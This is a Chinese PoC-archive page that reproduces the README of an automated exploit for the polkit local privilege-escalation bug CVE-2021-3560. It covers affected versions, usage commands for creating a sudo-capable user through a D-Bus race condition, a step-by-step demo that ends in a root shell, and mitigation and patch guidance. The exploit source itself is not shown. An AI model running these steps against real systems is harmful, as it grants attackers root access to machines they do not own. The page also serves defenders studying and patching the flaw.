关联漏洞
标题:polkit 代码问题漏洞 (CVE-2021-3560)描述:polkit是一个在类 Unix操作系统中控制系统范围权限的组件。通过定义和审核权限规则,实现不同优先级进程间的通讯。 polkit 存在代码问题漏洞,该漏洞源于当请求进程在调用polkit_system_bus_name_get_creds_sync之前断开与dbus-daemon的连接时,该进程无法获得进程的唯一uid和pid,也无法验证请求进程的特权。
描述
Exploit for CVE-2021-3560 Polkit Local Privilege Escalation Vulnerability
介绍
# CVE-2021-3560 Polkit Local Privilege Escalation
```
.--. .-" "-. .--.
/ .. \/ .-. .-. \/ .. \
| | '| / Y \ |' | |
| \ \ \ 0 | 0 / / / |
\ '- ,\.-"`` ``"-./, -' /
`'-' /_ ^ ^ _\ '-'`
.--'| \._ _./ |'--.
/` \ \ `~` / / `\
/ '._ '---' _.' \
/ '~---~' \
/ \
```
An automated exploit for the **CVE-2021-3560** vulnerability affecting PolicyKit (Polkit) on Linux systems.
> ⚠️ **WARNING**: This tool is intended for educational and cybersecurity training purposes only in a controlled lab environment. Unauthorized use of this exploit on systems you do not own is illegal.
## 📋 Table of Contents
- [About the Vulnerability](#-about-the-vulnerability)
- [Vulnerable Systems](#-vulnerable-systems)
- [Features](#-features)
- [Prerequisites](#-prerequisites)
- [Installation](#-installation)
- [Usage](#-usage)
- [How It Works](#-how-it-works)
- [Demonstration](#-demonstration)
- [Mitigation](#-mitigation)
- [References](#-references)
## 🔍 About the Vulnerability
**CVE-2021-3560** is a local race condition vulnerability in PolicyKit (polkit) that allows an unprivileged user to gain root privileges on vulnerable Linux systems.
### Technical Details
- **CVE ID**: CVE-2021-3560
- **Severity**: High (CVSS 7.8)
- **Type**: Race Condition / Time-of-Check Time-of-Use (TOCTOU)
- **Impact**: Local Privilege Escalation (LPE)
- **Disclosure Date**: June 2021
### Affected Versions
The vulnerability affects two branches of Polkit with different version numbering:
#### Upstream (official versions)
- **Vulnerable**: 0.113 to 0.118
- **Bug introduced**: Commit `bfa5036` (version 0.113)
- **Fixed**: Version 0.119+
#### Debian/Ubuntu fork
- **Vulnerable**: 0.105-26 and higher (up to 0.118)
- **Bug introduced**: Commit `f81d021` (version 0.105-26)
- **NOT vulnerable**: Debian 10 "buster" (0.105-25)
## 💻 Vulnerable Systems
| Distribution | Polkit Version | Vulnerable? |
|---------------------------|-------------------|-------------|
| **Ubuntu 20.04** | 0.105-26ubuntu1 | ✅ Yes |
| Ubuntu 18.04 | 0.105-20 | ❌ No |
| **Debian testing "bullseye"** | 0.105-31+ | ✅ Yes |
| Debian 10 "buster" | 0.105-25 | ❌ No |
| **RHEL 8** | 0.115-11+ | ✅ Yes |
| RHEL 7 | < 0.113 | ❌ No |
| **Fedora 21+** | 0.113+ | ✅ Yes |
| Fedora 20 and earlier | < 0.113 | ❌ No |
> 📝 **Note**: Systems with security patches applied (e.g., ubuntu1.1, deb10u1) are **not** vulnerable.
## ✨ Features
- ✅ **Automatic detection** of vulnerability across multiple distributions
- ✅ **Multi-OS support**: Debian, Ubuntu, RHEL, CentOS, Fedora, Arch Linux
- ✅ **Dependency verification** for required tools
- ✅ **Check mode**: Verify vulnerability without exploitation
- ✅ **Adaptive timing**: Automatic measurement of optimal race condition timing
- ✅ **Progress indicators**: Real-time progress display
- ✅ **Colored output**: Clear and easy-to-read interface
- ✅ **Robust error handling**: Explicit messages on failure
## 📦 Prerequisites
### Python Version
- **Python 3.6+** (compatible with older systems like CentOS 8)
### System Dependencies
The exploit requires the following tools (automatically verified):
```bash
- dbus-send # To communicate with D-Bus
- pkexec # Part of PolicyKit
- id # To verify user creation
- openssl # To generate password hash
```
### Required Service
```bash
- accountsservice # Must be installed and active
```
## 🚀 Installation
```bash
# Clone the repository (or download the file)
git clone https://github.com/[your-repo]/CVE-2021-3560_Polkit.git
cd CVE-2021-3560_Polkit
# Make the script executable
chmod +x CVE-2021-3560_Polkit.py
```
## 📖 Usage
### Mode 1: Vulnerability Check (--check)
Check if the system is vulnerable **without** running the exploit:
```bash
python3 CVE-2021-3560_Polkit.py --check
```
**Example output**:
```
[*] ============================================================
[*] CVE-2021-3560 Polkit Vulnerability Checker
[*] ============================================================
[*] Detecting operating system...
[+] OS: Ubuntu 20.04
[*] Checking required dependencies...
[+] Found: dbus-send
[+] Found: pkexec
[+] Found: id
[+] Found: openssl
[*] Detecting Polkit version...
[+] Polkit version: 0.105-26ubuntu1
[+] ============================================================
[+] SYSTEM APPEARS VULNERABLE!
[+] ============================================================
[*] Debian/Ubuntu fork detected (vulnerable since 0.105-26)
```
### Mode 2: Exploitation
Create a privileged user:
```bash
python3 CVE-2021-3560_Polkit.py -u <username> -p <password>
```
**Example**:
```bash
python3 CVE-2021-3560_Polkit.py -u hacker -p Password123!
```
### Complete Options
```
usage: CVE-2021-3560_Polkit.py [-h] [-u USERNAME] [-p PASSWORD] [-c]
options:
-h, --help Show help
-u, --username Username to create
-p, --password Password for new user
-c, --check Check vulnerability without exploiting
```
## ⚙️ How It Works
The exploit exploits a **race condition** in PolicyKit during D-Bus request processing.
### Vulnerability Principle
1. **D-Bus Request**: The user sends a D-Bus request to create a user
2. **Authorization Check**: Polkit verifies if the user has permissions
3. **Race Condition**: If the D-Bus connection is closed during verification, Polkit treats the UID as 0 (root)
4. **User Creation**: The user is created with elevated privileges
### Exploit Steps
```
┌─────────────────────────────────────────────────────────┐
│ 1. Optimal timing measurement │
│ └─> Test execution to calibrate timing │
├─────────────────────────────────────────────────────────┤
│ 2. Exploitation: User creation │
│ └─> Send D-Bus CreateUser request │
│ └─> Kill process at precise moment (race condition) │
│ └─> Verify if user created │
├─────────────────────────────────────────────────────────┤
│ 3. Password hash generation │
│ └─> Using openssl passwd -6 │
├─────────────────────────────────────────────────────────┤
│ 4. Exploitation: Password setting │
│ └─> Send D-Bus SetPassword request │
│ └─> Kill process at precise moment (race condition) │
│ └─> Test login with password │
├─────────────────────────────────────────────────────────┤
│ 5. Privilege escalation │
│ └─> Login with created account │
│ └─> Use sudo if member of sudo group │
└─────────────────────────────────────────────────────────┘
```
## 🎬 Demonstration
### Typical Exploitation Scenario
```bash
# 1. Check vulnerability
user@vulnerable:~$ python3 CVE-2021-3560_Polkit.py --check
[+] SYSTEM APPEARS VULNERABLE!
# 2. Launch exploit
user@vulnerable:~$ python3 CVE-2021-3560_Polkit.py -u pwned -p Pwn3d123!
╔═══════════════════════════════════════════════════════════╗
║ CVE-2021-3560 Polkit Privilege Escalation ║
╚═══════════════════════════════════════════════════════════╝
[*] Creating user 'pwned' using race condition timing attack...
[*] Measuring command execution time...
[*] Command takes ~0.045s, using 0.023s timing
[*] Attempting race condition exploit, please wait...
[+] User 'pwned' created successfully! UID: 1001
[*] User is member of groups: 1001(pwned) 27(sudo)
[*] Generating password hash...
[+] Password hash generated
[*] Setting password for user 'pwned'...
[+] Password set successfully!
╔═══════════════════════════════════════════════════════════╗
║ EXPLOIT SUCCESSFUL! ║
╚═══════════════════════════════════════════════════════════╝
[+] User 'pwned' created with password 'Pwn3d123!'
[*] User should be member of 'sudo' group for privilege escalation
[*] Switching to user 'pwned'...
# 3. Get root
pwned@vulnerable:~$ sudo su
root@vulnerable:~# id
uid=0(root) gid=0(root) groups=0(root)
```
## 🛡️ Mitigation
### For System Administrators
1. **Update PolicyKit**:
```bash
# Debian/Ubuntu
sudo apt update && sudo apt upgrade policykit-1
# RHEL/CentOS/Fedora
sudo yum update polkit
# or
sudo dnf update polkit
```
2. **Check version**:
```bash
pkexec --version
# Must be >= 0.119 (upstream) or patched
```
3. **Verify security patches**:
```bash
# Debian/Ubuntu
apt-cache policy policykit-1
# RHEL/CentOS/Fedora
rpm -q --changelog polkit | grep CVE-2021-3560
```
### Minimum Secure Version
- **Upstream**: ≥ 0.119
- **Ubuntu 20.04**: 0.105-26ubuntu1.**1** or higher
- **Debian 11**: 0.105-31+deb11u**1** or higher
- **RHEL 8**: polkit-0.115-11.el8_4.**1** or higher
## 📚 References
### Official Articles and Documentation
- **GitHub Security Lab**: [Privilege escalation with Polkit: How to get root on Linux with a seven-year-old bug](https://github.blog/security/vulnerability-research/privilege-escalation-polkit-root-on-linux-with-bug/)
- **Red Hat CVE**: [CVE-2021-3560](https://access.redhat.com/security/cve/cve-2021-3560)
- **MITRE CVE**: [CVE-2021-3560](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3560)
- **NVD NIST**: [CVE-2021-3560 Detail](https://nvd.nist.gov/vuln/detail/CVE-2021-3560)
### TryHackMe Resources
- **TryHackMe Room**: [Polkit CVE-2021-3560 (Practice)](https://tryhackme.com/room/polkit)
### Patches and Fixes
- **GitLab Polkit**: [Fix commit](https://gitlab.freedesktop.org/polkit/polkit/-/commit/a2bf5c9c83b6ae46cbd5c779d3055bff81ded683)
## 📝 Important Notes
### Success Rate
The exploit relies on a race condition, which means:
- ✅ Generally works in **1-20 attempts**
- ⏱️ Timing is **critical** (automatically calibrated)
- 🔄 Maximum **100 attempts** per step (configurable)
- 📡 Better success rate via **SSH** rather than local console
### Limitations
- ❌ Does **not** work on patched systems
- ❌ Requires **accountsservice** installed and active
- ❌ User must have access to **system D-Bus**
- ❌ Some environments (containers, specific VMs) may block the exploit
### Patched Versions (NOT Vulnerable)
The following versions include security patches and are **NOT vulnerable**:
- `0.105-26ubuntu1.1`, `0.105-26ubuntu1.2`, `0.105-26ubuntu1.3`, etc. (Ubuntu patched)
- `0.105-26ubuntu2.1`, `0.105-26ubuntu2.2`, etc. (Ubuntu patched)
- `0.105-31+deb11u1` (Debian 11 patched)
- `polkit-0.115-11.el8_4.1` (RHEL 8 patched)
**Note**: If your system shows as vulnerable but the exploit fails with `PermissionDenied` errors, it's likely because the version is patched. The exploit will now correctly detect these patched versions.
### Debugging
If the exploit fails:
1. **Check Python version** (if you get `TypeError: __init__() got an unexpected keyword argument 'capture_output'`):
```bash
python3 --version
# Should be 3.6 or higher
# The script is compatible with Python 3.6+
```
2. **Check if version is patched**:
```bash
pkexec --version
# If you see ubuntu1.X (where X > 0), it's patched
```
3. **Check accountsservice**:
```bash
systemctl status accounts-daemon
```
4. **Check D-Bus**:
```bash
dbus-send --system --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames
```
5. **Launch from SSH** rather than local console
6. **Adjust timing** by modifying `optimal_timing` in the code
## 👤 Author
**Seimu**
## 📄 License
This project is intended for educational purposes only. Use of this code for unauthorized activities is strictly prohibited and may result in legal action.
---
> ⚠️ **Disclaimer**: The author is not responsible for any misuse of this tool. Use it only in authorized test environments.
文件快照
[4.0K] /data/pocs/8f685fd763b770cee78f2907ee69e8f323519359
├── [ 18K] CVE-2021-3560_Polkit.py
├── [ 17K] CVE-2021-3560_Polkit.sh
└── [ 13K] README.md
1 directory, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。